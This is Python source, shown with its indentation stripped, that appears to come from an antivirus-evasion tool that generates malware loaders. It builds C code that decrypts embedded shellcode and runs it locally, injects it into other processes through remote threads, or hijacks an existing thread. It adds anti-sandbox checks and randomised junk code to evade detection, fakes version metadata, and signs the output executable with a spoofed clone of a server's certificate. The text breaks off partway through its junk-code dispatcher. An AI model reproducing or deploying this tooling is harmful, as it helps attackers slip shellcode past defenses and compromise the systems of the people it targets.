def twin_tower(H):
randbig1 = str(randrange(10 * H, 99 * H, 10))
randbig2 = str(randrange(10 * H, 77 * H, 10))
randcpt = core.varname_creator()
randcpt2 = core.varname_creator()
junkcode = "int " + randcpt + " = " + randbig1 + ";\n"
junkcode += "int " + randcpt2 + " = " + randbig2 + ";\n"
junkcode += "while ( " + randcpt + " > 0 ){\n"
junkcode += "if (" + randcpt + " > " + randcpt2 + "){\n"
junkcode += randcpt + " = " + randcpt + " - 1;\n"
junkcode += "}else{\n"
junkcode += randcpt2 + " = " + randcpt2 + " - 1;}}\n"
return junkcode
def fibonacci(H):
rand1 = core.varname_creator()
rand2 = core.varname_creator()
rand3 = core.varname_creator()
rand4 = core.varname_creator()
rand5 = core.varname_creator()
randbignumb = str(randint(10 * H, 99 * H))
junkcode = "int " + rand1 + " = 0," + rand2 + " = 1," + rand3 + "," + rand4 + "," + rand5 + " = 0;\n"
junkcode += rand4 + " = " + randbignumb + ";\n"
junkcode += "while (" + rand5 + " < " + rand4 + "){\n"
junkcode += rand3 + " = " + rand1 + " + " + rand2 + ";\n" + rand5 + "++;\n"
junkcode += rand1 + "=" + rand2 + ";\n" + rand2 + " = " + rand3 + ";}\n"
return junkcode
def ceil_routine_2(H):
randranges = str(randint(10 * H, 99 * H))
randvar = core.varname_creator()
randvar2 = core.varname_creator()
randflag = core.varname_creator()
junkcode = "int " + randflag + " = -1;\n"
junkcode += "double *" + randvar + " = (double*)malloc(sizeof(double)*" + randranges + ");\n"
junkcode += "double *" + randvar2 + " = (double*)malloc(sizeof(double)*" + randranges + ");\n"
junkcode += "do{\n"
junkcode += randflag + "++;\n"
junkcode += randvar + "[" + randflag + "] = (double)(rand() % 1000) / (double)(rand() % 70);\n"
junkcode += randvar2 + "[" + randflag + "] = ceil(" + randvar + "[" + randflag + "]);}while(" + randflag + " < " + randranges + "-1);\n"
return junkcode
def fake_u(value, junkcode, intensity):
number_of_decoy = value
if number_of_decoy != "":
transform_to_int = int(number_of_decoy)
number_of_decoy = 0
decoy_code = ""
while number_of_decoy != transform_to_int:
number_of_decoy += 1
memdmp1 = core.varname_creator()
tac1 = core.varname_creator()
tick1 = core.varname_creator()
memdmp1_value = str(random.randint(30000000, 330000000))
decoy_code += "char * " + memdmp1 + "= NULL;\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += memdmp1 + " = (char *)malloc(" + memdmp1_value + ");\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "if (" + memdmp1 + " != NULL)\n"
decoy_code += "{\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "memset(" + memdmp1 + ", 00, " + memdmp1_value + ");\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "}\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "int " + tick1 + " = GetTickCount();\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "Sleep(1000);\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "int " + tac1 + " = GetTickCount();\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "if ((" + tac1 + " - " + tick1 + ") < 1000)\n"
decoy_code += "{\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "exit(0);\n"
decoy_code += "}\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
decoy_code += "free(" + memdmp1 + ");\n"
decoy_code += junk.junk_inject(junkcode, "code", intensity)
core.decoy_added()
return decoy_code
elif number_of_decoy == "":
return ""
def geometric_2(H):
randranges = str(randint(10 * H, 99 * H))
randsum = core.varname_creator()
randflag = core.varname_creator()
randdiv = core.varname_creator()
junkcode = "double " + randsum + "=0;\n"
junkcode += "double " + randdiv + "=1;\n"
junkcode += "int " + randflag + "=0;\n"
junkcode += "do{\n"
junkcode += randflag + " += 1;\n"
junkcode += randdiv + "=" + randdiv + "* 2;\n"
junkcode += randsum + " = " + randsum + " + (1 / " + randdiv + ");\n"
junkcode += "if(" + randsum + " == 1.00)break;}while(" + randflag + " < " + randranges + ");\n"
return junkcode
def primes_number_sos(H):
randarraysize = core.varname_creator()
randranges = str(randint(10 * H, 99 * H))
randprimevar = core.varname_creator()
randprimenumb = core.varname_creator()
randsizevar = core.varname_creator()
isprime = core.varname_creator()
randn = core.varname_creator()
randflag = core.varname_creator()
randflag2 = core.varname_creator()
junkcode = "int " + randflag + "," + randflag2 + ";\n"
junkcode += "int " + randprimevar + " = 0;\n"
junkcode += "int " + randarraysize + " = " + randranges + ";\n"
junkcode += "int " + randn + " = " + randranges + " / 2;\n"
junkcode += "int " + randsizevar + ";\n"
junkcode += "int* " + isprime + " = (int*)malloc(sizeof(int) * (" + randarraysize + " + 1));\n"
junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randn + ";" + randflag + "++){\n"
junkcode += isprime + "[" + randflag + "] = " + randflag + ";}\n"
junkcode += "for(" + randflag + " = 1;" + randflag + " < " + randn + ";" + randflag + "++){\n"
junkcode += "for(" + randflag2 + " = " + randflag + ";" + randflag2 + " <= (" + randn + " - " + randflag + ")/(2 * " + randflag + " + 1);" + randflag2 + "++){\n"
junkcode += isprime + "[" + randflag + " + " + randflag2 + " + 2 * " + randflag + " + " + randflag2 + "] = 0;}}\n"
junkcode += "if(" + randarraysize + " > 2){\n"
junkcode += isprime + "[" + randprimevar + "++] = 2;}\n"
junkcode += "for(" + randflag + " = 1;" + randflag + " < " + randn + ";" + randflag + "++){\n"
junkcode += "if(" + isprime + "[" + randflag + "] != 0){\n"
junkcode += isprime + "[" + randprimevar + "++] = " + randflag + " * 2 + 1;}}\n"
junkcode += randsizevar + " = sizeof " + isprime + " / sizeof(int);\n"
junkcode += "int " + randprimenumb + " = 0;\n"
junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randsizevar + ";" + randflag + "++){\n"
junkcode += "if(" + isprime + "[" + randflag + "] != 0){\n"
junkcode += randprimenumb + " ++;}}\n"
junkcode += "free(" + isprime + ");\n"
return junkcode
def reverse_array_2(H):
randranges = str(randint(10 * H, 99 * H))
randvar = core.varname_creator()
randrevvar = core.varname_creator()
randflag = core.varname_creator()
randLenght = core.varname_creator()
junkcode = "int " + randflag + ";\n"
junkcode += "int* " + randvar + " = (int*)malloc(sizeof(int) * " + randranges + ");\n"
junkcode += "int* " + randrevvar + " = (int*)malloc(sizeof(int) * " + randranges + ");\n"
junkcode += "int " + randLenght + " = " + randranges + " - 1;\n"
junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n"
junkcode += randvar + "[" + randflag + "] = rand() % 300;\n"
junkcode += randrevvar + "[" + randflag + "] = " + randvar + "[" + randLenght + "];\n"
junkcode += randLenght + " = " + randLenght + " - 1;}\n"
junkcode += "free(" + randvar + ");free(" + randrevvar + ");\n"
return junkcode
def decrypt_stub(encrypted_shellcode, key):
eshellcode = core.varname_creator()
dkey = core.varname_creator()
vshellcode = core.varname_creator()
j = core.varname_creator()
i = core.varname_creator()
stub = "char " + eshellcode + "[]=" + '"' + encrypted_shellcode + '";\n'
stub += "char " + dkey + "[]=" + '"' + key + '";\n'
stub += "char " + vshellcode + "[sizeof " + eshellcode + "];\n"
stub += "int " + j + "=0;\n"
stub += "for (int " + i + "=0; " + i + "< sizeof " + eshellcode + "; " + i + "++){\n"
stub += "if (" + j + "== sizeof " + dkey + "-1) " + j + "=0;\n"
stub += vshellcode + "[" + i + "]=" + eshellcode + "[" + i + "] ^ " + dkey + "[" + j + "];\n"
stub += j + "++;}\n"
return vshellcode, stub
def back_to_zero(H):
randbig1 = str(randrange(10 * H, 99 * H, 10))
randcpt = core.varname_creator()
junkcode = "int " + randcpt + " = " + randbig1 + ";\n"
junkcode += "while ( " + randcpt + " > 0 ){\n"
junkcode += randcpt + " = " + randcpt + " - 1;}\n"
return junkcode
def random_numbers(H):
randranges = str(randint(10 * H, 99 * H))
randvarr = core.varname_creator()
randflag = core.varname_creator()
randflag2 = core.varname_creator()
junkcode = "int " + randflag + "," + randflag2 + " = 0;\n"
junkcode += "float* " + randvarr + " = (float*)malloc(sizeof(float) * " + randranges + ");\n"
junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n"
junkcode += randflag2 + " = rand() % 400;\n"
junkcode += "if(" + randflag2 + " > 360){\n"
junkcode += randvarr + "[" + randflag + "] = 0;\n"
junkcode += "}else if(" + randflag2 + " < 0){\n"
junkcode += randvarr + "[" + randflag + "] = 0;\n"
junkcode += "}else{\n"
junkcode += randvarr + "[" + randflag + "] = " + randflag2 + " * 0.1 / 360;\n}}"
junkcode += "free(" + randvarr + ");\n"
return junkcode
def local_ti(vshellcode, decoder_stub):
execs = core.varname_creator()
lti = decoder_stub
lti += f"\nvoid *{execs} = VirtualAlloc(0, sizeof {vshellcode}, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
lti += f"memcpy({execs}, {vshellcode}, sizeof {vshellcode});\n"
lti += f"((void(*)()){execs})();\n"
lti += "}"
return lti
def average_2(H):
randranges = str(randint(10 * H, 99 * H))
randsum = core.varname_creator()
randsum2 = core.varname_creator()
randaverage = core.varname_creator()
randvar = core.varname_creator()
randflag = core.varname_creator()
junkcode = "int " + randflag + ";\n"
junkcode += "int " + randsum + " = 0;int " + randsum2 + " = 0;\n"
junkcode += "int* " + randvar + " = (int*)malloc(sizeof(int) * " + randranges + ");\n"
junkcode += "float " + randaverage + ";\n"
junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n"
junkcode += randvar + "[" + randflag + "] = rand() % 25;\n"
junkcode += randsum + " = " + randsum + " + " + randvar + "[" + randflag + "];}\n"
junkcode += randaverage + "/((float)" + randranges + ");\n"
junkcode += "free(" + randvar + ");\n"
return junkcode
def primes_number_soe(H):
randranges = str(randint(10 * H, 99 * H))
randprimevar = core.varname_creator()
randvar = core.varname_creator()
randflag = core.varname_creator()
randflag2 = core.varname_creator()
junkcode = "unsigned long long int " + randflag + "," + randflag2 + ";\n"
junkcode += "int *" + randprimevar + ";\n"
junkcode += "int " + randvar + " = 1;\n"
junkcode += randprimevar + " = (int*)malloc(sizeof(int) * " + randranges + ");\n"
junkcode += "for(" + randflag + " = 2;" + randflag + " < " + randranges + ";" + randflag + "++){\n"
junkcode += randprimevar + "[" + randflag + "] = 1;}\n"
junkcode += "for(" + randflag + " = 2;" + randflag + " < " + randranges + ";" + randflag + "++){\n"
junkcode += "if(" + randprimevar + "[" + randflag + "]){\n"
junkcode += "for(" + randflag2 + " = " + randflag + ";" + randflag + " * " + randflag2 + " < " + randranges + ";" + randflag2 + "++){\n"
junkcode += randprimevar + "[" + randflag + " * " + randflag2 + "] = 0;}}}\n"
junkcode += "free(" + randprimevar + ");\n"
return junkcode
def odd_or_even_2(H):
randranges = str(randint(10 * H, 99 * H))
randvar = core.varname_creator()
randflag = core.varname_creator()
randodd = core.varname_creator()
randeven = core.varname_creator()
junkcode = "int " + randflag + ";\n"
junkcode += "int *" + randvar + " = (int*)malloc(sizeof(int)*" + randranges + ");\n"
junkcode += "int " + randodd + " = 0;\n"
junkcode += "int " + randeven + " = 0;\n"
junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n"
junkcode += randvar + "[" + randflag + "] = rand() % 1000;\n"
junkcode += "if(" + randvar + "[" + randflag + "]&1){\n"
junkcode += randodd + " += 1;\n"
junkcode += "}else if(!(" + randvar + "[" + randflag + "]&1)){\n"
junkcode += randeven + " += 1;}}\n"
junkcode += "free(" + randvar + ");\n"
return junkcode
def last_armstrong(H):
randranges = str(randint(10 * H, 99 * H))
randvar = core.varname_creator()
randvar2 = core.varname_creator()
randflag = core.varname_creator()
randflag2 = core.varname_creator()
randLastArmN = core.varname_creator()
junkcode = "int " + randLastArmN + ";\n"
junkcode += "int " + randvar + "," + randflag + "," + randvar2 + "," + randflag2 + ";\n"
junkcode += "for(" + randflag + " = 1;" + randflag + " <= " + randranges + ";" + randflag + "++){\n"
junkcode += randvar + " = 0;\n"
junkcode += randvar2 + " = " + randflag + ";\n"
junkcode += "while(" + randvar2 + " != 0){\n"
junkcode += randflag2 + " = " + randvar2 + "%10;\n"
junkcode += randvar + " += " + randflag2 + "*" + randflag2 + "*" + randflag2 + ";\n"
junkcode += randvar2 + " = " + randvar2 + "/10;}\n"
junkcode += "if(" + randvar + " == " + randflag + "){\n"
junkcode += randLastArmN + " = " + randflag + ";}}\n"
return junkcode
def remote_thread_injection(processname, vShellcode, decoder_stub, junkcode,
intensity):
entry = core.varname_creator()
snapshot = core.varname_creator()
process_handle = core.varname_creator()
remote_thread = core.varname_creator()
remote_buffer = core.varname_creator()
rti = decoder_stub
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "\nPROCESSENTRY32 " + entry + ";\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += entry + ".dwSize = sizeof(PROCESSENTRY32);\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "HANDLE " + snapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "if (Process32First(" + snapshot + ", &" + entry + ") == TRUE)\n"
rti += "{\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "while (Process32Next(" + snapshot + ", &" + entry + ") == TRUE)\n"
rti += "{\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += 'if (stricmp(' + entry + '.szExeFile, ' + '"' + processname + '"' + ') == 0)'
rti += '{\n'
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "HANDLE " + process_handle + ";\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "HANDLE " + remote_thread + ";\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "PVOID " + remote_buffer + ";\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += process_handle + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE, " + entry + ".th32ProcessID);\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += remote_buffer + " = VirtualAllocEx(" + process_handle + ", NULL, sizeof " + vShellcode + ", (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "WriteProcessMemory(" + process_handle + ", " + remote_buffer + ", " + vShellcode + ", sizeof " + vShellcode + ", NULL);\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += remote_thread + " = CreateRemoteThread(" + process_handle + ", NULL, 0, (LPTHREAD_START_ROUTINE)" + remote_buffer + ", NULL, 0, NULL);\n"
rti += junk.junk_inject(junkcode, "code", intensity)
rti += "CloseHandle(" + process_handle + ");}}}\n"
rti += "CloseHandle(" + snapshot + ");"
rti += "}\n"
return rti
def local_thread_injection(vShellcode, decoder_stub, junkcode, intensity):
execs = core.varname_creator()
lti = decoder_stub
lti += junk.junk_inject(junkcode, "code", intensity)
lti += "\nvoid *" + execs + " = VirtualAlloc(0, sizeof " + vShellcode + ", MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
lti += junk.junk_inject(junkcode, "code", intensity)
lti += "memcpy(" + execs + ", " + vShellcode + ", sizeof " + vShellcode + ");\n"
lti += junk.junk_inject(junkcode, "code", intensity)
lti += "((void(*)())" + execs + ")();\n"
lti += "}\n"
return lti
def buble_sort_float_array(H):
randranges = str(randint(10 * H, 99 * H))
randvar = core.varname_creator()
randvar2 = core.varname_creator()
randflag = core.varname_creator()
randflag2 = core.varname_creator()
junkcode = "float *" + randvar + " = (float*)malloc(sizeof(float)*" + randranges + ");\n"
junkcode += "int " + randflag + ";\n"
junkcode += "int " + randflag2 + ";\n"
junkcode += "float " + randvar2 + ";\n"
junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n"
junkcode += randvar + "[" + randflag + "] = (float)(rand() % 1000) / (float)(rand() % 70);}\n"
junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n"
junkcode += "for(" + randflag2 + " = 0;" + randflag2 + " < (" + randranges + " - " + randflag + " - 1);" + randflag + "++){\n"
junkcode += "if(" + randvar + "[" + randflag + "] > " + randvar + "[" + randflag2 + " + 1]){"
junkcode += randvar2 + " = " + randvar + "[" + randflag2 + "];\n"
junkcode += randvar + "[" + randflag2 + "] = " + randvar + "[" + randflag + " + 1];\n"
junkcode += randvar + "[" + randflag2 + " + 1] = " + randvar2 + ";}}}\n"
junkcode += "free(" + randvar + ");\n"
return junkcode
def gnome_sort_int_array(H):
randranges = str(randint(10 * H, 99 * H))
randvar = core.varname_creator()
randtemp = core.varname_creator()
randflag = core.varname_creator()
junkcode = "int *" + randvar + " = (int*)malloc(sizeof(int)*" + randranges + ");\n"
junkcode += "int " + randflag + ";\n"
junkcode += "int " + randtemp + ";\n"
junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n"
junkcode += randvar + "[" + randflag + "] = rand() % 10000;}\n"
junkcode += randflag + "=0;\n"
junkcode += "while(" + randflag + " < " + randranges + "){\n"
junkcode += "if(" + randflag + " == 0 || " + randvar + "[" + randflag + "-1] <= " + randvar + "[" + randflag + "]){\n"
junkcode += randflag + "++;\n"
junkcode += "}else{\n"
junkcode += randtemp + " = " + randvar + "[" + randflag + "-1];\n"
junkcode += randvar + "[" + randflag + "-1] = " + randvar + "[" + randflag + "];\n"
junkcode += randvar + "[" + randflag + "] = " + randtemp + ";\n"
junkcode += randflag + " = " + randflag + "-1;}}\n"
junkcode += "free(" + randvar + ");\n"
return junkcode
def rc_info_maker(filename, require_admin):
rc_info = ""
if require_admin == "yes":
filename = filename.replace("output", "tmp") + '.manifest"'
rc_info += '1 MANIFEST "' + filename + "\n"
admin_privs(filename)
rc_info += "1 VERSIONINFO\n"
rc_info += "FILEVERSION " + str(rc_version()) + "," + str(rc_version()) + "\n"
rc_info += "PRODUCTVERSION " + str(rc_version()) + "," + str(rc_version()) + "\n"
rc_info += "BEGIN\n" + 'BLOCK "StringFileInfo"\n'
rc_info += "BEGIN\n"
rc_info += 'BLOCK "080904E4"\n'
rc_info += 'BEGIN\n'
rc_info += 'VALUE "CompanyName", "' + str(core.varname_creator()) + '"\n'
rc_info += 'VALUE "FileDescription", "' + str(core.varname_creator()) + '"\n'
rc_info += 'VALUE "FileVersion", "' + str(rc_version()) + "." + str(rc_version()) + '"\n'
rc_info += 'VALUE "InternalName", "' + str(core.varname_creator()) + '"\n'
rc_info += 'VALUE "LegalCopyright", "' + str(core.varname_creator()) + '"\n'
rc_info += 'VALUE "OriginalFilename", "' + str(core.varname_creator()) + '"\n'
rc_info += 'VALUE "ProductName", "' + str(core.varname_creator()) + '"\n'
rc_info += 'VALUE "ProductVersion", "' + str(rc_version()) + "." + str(rc_version()) + '"\n'
rc_info += 'END\n'
rc_info += 'END\n'
rc_info += 'BLOCK "VarFileInfo"\n'
rc_info += 'BEGIN\n'
rc_info += 'VALUE "Translation", 0x809, 1252\n'
rc_info += 'END\n'
rc_info += 'END\n'
return rc_info
def spoofer(host, port, filename, out):
try:
ogcert = get_server_certificate((host, int(port)))
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, ogcert)
certDir = Path('certs')
certDir.mkdir(exist_ok=True)
# Creating Fake Certificate
CNCRT = certDir / (host + ".crt")
CNKEY = certDir / (host + ".key")
PFXFILE = certDir / (host + ".pfx")
# Creating Keygen
k = crypto.PKey()
k.generate_key(crypto.TYPE_RSA, ((x509.get_pubkey()).bits()))
cert = crypto.X509()
# Setting Cert details from loaded from the original Certificate
cert.set_version(x509.get_version())
cert.set_serial_number(x509.get_serial_number())
cert.set_subject(x509.get_subject())
cert.set_issuer(x509.get_issuer())
cert.set_notBefore(x509.get_notBefore())
cert.set_notAfter(x509.get_notAfter())
cert.set_pubkey(k)
cert.sign(k, 'sha256')
CNCRT.write_bytes(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
CNKEY.write_bytes(crypto.dump_privatekey(crypto.FILETYPE_PEM, k))
try:
pfx = crypto.PKCS12()
except AttributeError:
pfx = crypto.PKCS12Type()
pfx.set_privatekey(k)
pfx.set_certificate(cert)
pfxdata = pfx.export()
PFXFILE.write_bytes(pfxdata)
args = ("osslsigncode", "sign", "-pkcs12", PFXFILE, "-n", core.varname_creator(), "-i", TIMESTAMP_URL, "-in", filename, "-out", out)
call(args, stdout=PIPE)
core.exe_signed()
system(f"mv output/malware.exe {filename} && rm -rf certs/")
except Exception as ex:
print("[X] Something Went Wrong!\n[X] Exception: " + str(ex))
def number_of_core(junkcode, intensity):
evasion_funcname = "void " + core.varname_creator() + "(void)\n"
sysguide = core.varname_creator()
xcore = core.varname_creator()
evasion_func = evasion_funcname
evasion_func += "{\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "SYSTEM_INFO " + sysguide + ";\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "GetSystemInfo(&" + sysguide + ");\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "int " + xcore + " = " + sysguide + ".dwNumberOfProcessors;\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "if (" + xcore + " < 2)\n"
evasion_func += "{\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "exit(0);\n"
evasion_func += "}\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "}\n\n"
evasion_funcname = replace_string(evasion_funcname)
return evasion_funcname, evasion_func
def my_name_is(filename, junkcode, intensity):
evasion_funcname = "void " + core.varname_creator() + "(char *args)\n"
b = core.varname_creator()
filename = filename.replace('output/', '')
evasion_func = evasion_funcname
evasion_func += "{\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += 'if (strstr(args, "' + filename + '") > 0)\n'
evasion_func += "{\n"
evasion_func += "int " + b + " = 0;\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "}\n"
evasion_func += "else"
evasion_func += "{\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "exit(0);\n"
evasion_func += "}\n"
evasion_func += junk.junk_inject(junkcode, "code", intensity)
evasion_func += "}\n\n"
evasion_funcname = evasion_funcname.replace("(char *args)", "(argv[0])")
evasion_funcname = replace_string(evasion_funcname)
return evasion_funcname, evasion_func
def shaker_snort(H):
randranges = str(randint(10 * H, 99 * H))
randflag = core.varname_creator()
randflag2 = core.varname_creator()
randtemp = core.varname_creator()
randvar = core.varname_creator()
junkcode = "int " + randflag + ";\n"
junkcode += "int *" + randvar + " = (int*)malloc(sizeof(int)*" + randranges + ");\n"
junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n"
junkcode += randvar + "[" + randflag + "] = rand() % 10000;}\n"
junkcode += "int " + randflag2 + ";\n"
junkcode += "int " + randtemp + ";\n"
junkcode += "for (" + randflag2 + " = 1; " + randflag2 + " <= " + randranges + " / 2; " + randflag2 + "++){\n"
junkcode += "for (" + randflag + " = " + randflag2 + " - 1; " + randflag + " < " + randranges + " - " + randflag2 + "; " + randflag + "++){\n"
junkcode += "if (" + randvar + "[" + randflag + "] > " + randvar + "[" + randflag + "+1]){\n"
junkcode += randtemp + " = " + randvar + "[" + randflag + "];\n"
junkcode += randvar + "[" + randflag + "] = " + randvar + "[" + randflag + "+1];\n"
junkcode += randvar + "[" + randflag + "+1] = " + randtemp + ";}}\n"
junkcode += "for (" + randflag + " = " + randranges + " - " + randflag2 + " - 1; " + randflag + " >= " + randflag2 + "; " + randflag + "--){\n"
junkcode += "if (" + randvar + "[" + randflag + "] < " + randvar + "[" + randflag + "-1]){\n"
junkcode += randtemp + " = " + randvar + "[" + randflag + "];\n"
junkcode += randvar + "[" + randflag + "] = " + randvar + "[" + randflag + "-1];\n"
junkcode += randvar + "[" + randflag + "-1] = " + randtemp + ";}}}\n"
return junkcode
def remote_pth(procname, vshellcode, decoder_stub, arch):
entry = core.varname_creator()
snapshot0 = core.varname_creator()
targetProcessHandle = core.varname_creator()
remoteBuffer = core.varname_creator()
threadHijacked = core.varname_creator()
snapshot1 = core.varname_creator()
threadEntry = core.varname_creator()
context = core.varname_creator()
contextArch = "Rip"
if arch == "x86":
contextArch = "Eip"
rpth = decoder_stub
rpth += f"\nPROCESSENTRY32 {entry};"
rpth += f"{entry}.dwSize = sizeof(PROCESSENTRY32);"
rpth += f"HANDLE {snapshot0} = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);"
rpth += f"if (Process32First({snapshot0}, &{entry}) == TRUE)" + "{"
rpth += f"while (Process32Next({snapshot0}, &{entry}) == TRUE)" + "{"
rpth += f'if (stricmp({entry}.szExeFile, "{procname}") == 0)' + "{"
rpth += f"HANDLE {targetProcessHandle};"
rpth += f"PVOID {remoteBuffer};"
rpth += f"HANDLE {threadHijacked }= NULL;"
rpth += f"HANDLE {snapshot1};"
rpth += f"THREADENTRY32 {threadEntry};"
rpth += f"CONTEXT {context};"
rpth += f"{context}.ContextFlags = CONTEXT_FULL;"
rpth += f"{threadEntry}.dwSize = sizeof(THREADENTRY32);"
rpth += f"{targetProcessHandle} = OpenProcess(PROCESS_ALL_ACCESS, FALSE, {entry}.th32ProcessID);"
rpth += f"{remoteBuffer} = VirtualAllocEx({targetProcessHandle}, NULL, sizeof {vshellcode}, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);"
rpth += f"WriteProcessMemory({targetProcessHandle}, {remoteBuffer}, {vshellcode}, sizeof {vshellcode}, NULL);"
rpth += f"{snapshot1} = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);"
rpth += f"Thread32First({snapshot1}, &{threadEntry});"
rpth += f"while (Thread32Next({snapshot1}, &{threadEntry}))" + "{"
rpth += f"if ({threadEntry}.th32OwnerProcessID == {entry}.th32ProcessID)" + "{"
rpth += f"{threadHijacked} = OpenThread(THREAD_ALL_ACCESS, FALSE, {threadEntry}.th32ThreadID);" + "break;}}"
rpth += f"SuspendThread({threadHijacked});"
rpth += f"GetThreadContext({threadHijacked}, &{context});"
rpth += f"{context}.{contextArch} = (DWORD_PTR){remoteBuffer};"
rpth += f"SetThreadContext({threadHijacked}, &{context});"
rpth += f"ResumeThread({threadHijacked});" + "}}}"
rpth += f"CloseHandle({snapshot0});" + "}"
return rpth
def average_variance_stanard_and_deviation_2(H):
randranges = str(randint(10 * H, 99 * H))
randsum = core.varname_creator()
randsum2 = core.varname_creator()
randaverage = core.varname_creator()
randvariance = core.varname_creator()
randdevstd = core.varname_creator()
randvar = core.varname_creator()
randflag = core.varname_creator()
junkcode = "int " + randsum + " = 0;int " + randsum2 + " = 0;\n"
junkcode += "int *" + randvar + " = (int*)malloc(sizeof(int)*" + randranges + ");\n"
junkcode += "float " + randaverage + "," + randvariance + "," + randdevstd + ";\n"
junkcode += "int " + randflag + ";\n"
junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n"
junkcode += randvar + "[" + randflag + "] = rand() % 35;\n"
junkcode += randsum + " = " + randsum + " + " + randvar + "[" + randflag + "];}\n"
junkcode += randaverage + "/((float)" + randranges + ");\n"
junkcode += "for(" + randflag + " = 0;" + randflag + " < " + randranges + ";" + randflag + "++){\n"
junkcode += randsum2 + " = " + randsum2 + " + pow((" + randvar + "[" + randflag + "]" + " - " + randaverage + "),2);}\n"
junkcode += randvariance + " = " + randsum2 + "/((float)" + randranges + ");\n"
junkcode += randdevstd + " = sqrt(" + randvariance + ");\n"
junkcode += "free(" + randvar + ");\n"
return junkcode
def junk_inject(junk, method, intensity):
funcname = ""
func = ""
code = ""
if junk == "yes":
number = 0
if method == "code":
number += randint(4, 8)
else:
number += randint(64, 128)
injection = 0
while injection != number:
injection += 1
H = intensity
random_func = randint(1, 52)
funccode = ""
if random_func == 1:
funccode += sum_first_n_integer_1(H)
elif random_func == 2:
funccode += sum_first_n_inter_2(H)
elif random_func == 3:
funccode += fibonacci(H)
elif random_func == 4:
funccode += twin_tower(H)
elif random_func == 5:
funccode += back_to_zero(H)
elif random_func == 6:
funccode += back_to_num_1(H)
elif random_func == 7:
funccode += back_to_num_2(H)
elif random_func == 8:
funccode += primes_number_soe(H)
elif random_func == 9:
funccode += primes_number_sos(H)
elif random_func == 10:
funccode += average_1(H)
elif random_func == 11:
funccode += average_2(H)
elif random_func == 12:
funccode += average_variance_stanard_and_deviation_1(H)
elif random_func == 13:
funccode += average_variance_stanard_and_deviation_2(H)
elif random_func == 14:
funccode += reverse_array_1(H)
elif random_func == 15:
funccode += reverse_array_2(H)
elif random_func == 16:
funccode += double_reverse_array_1(H)
elif random_func == 17:
funccode += double_reverse_array_2(H)
elif random_func == 18:
funccode += random_numbers(H)
elif random_func == 19:
funccode += buble_sort_int_array(H)
elif random_func == 20:
funccode += buble_sort_float_array(H)
elif random_func == 21:
funccode += gnome_sort_int_array(H)
elif random_func == 22:
funccode += last_armstrong(H)
elif random_func == 23:
funccode += odd_or_even_1(H)
elif random_func == 24:
funccode += odd_or_even_2(H)
elif random_func == 25:
funccode += ceil_routine_1(H)
elif random_func == 26:
funccode += ceil_routine_2(H)
elif random_func == 27:
funccode += floor_routine_1(H)
elif random_func == 28:
funccode += floor_routine_2(H)
elif random_func == 29:
funccode += acos_routine_1(H)
elif random_func == 30:
funccode += acos_routine_2(H)
elif random_func == 31:
funccode += asin_routine_1(H)
elif random_func == 32:
funccode += asin_routine_2(H)
elif random_func == 33:
funccode += atan_routine_1(H)
elif random_func == 34:
funccode += atan_routine_2(H)
elif random_func == 35:
funccode += fabs_routine_1(H)
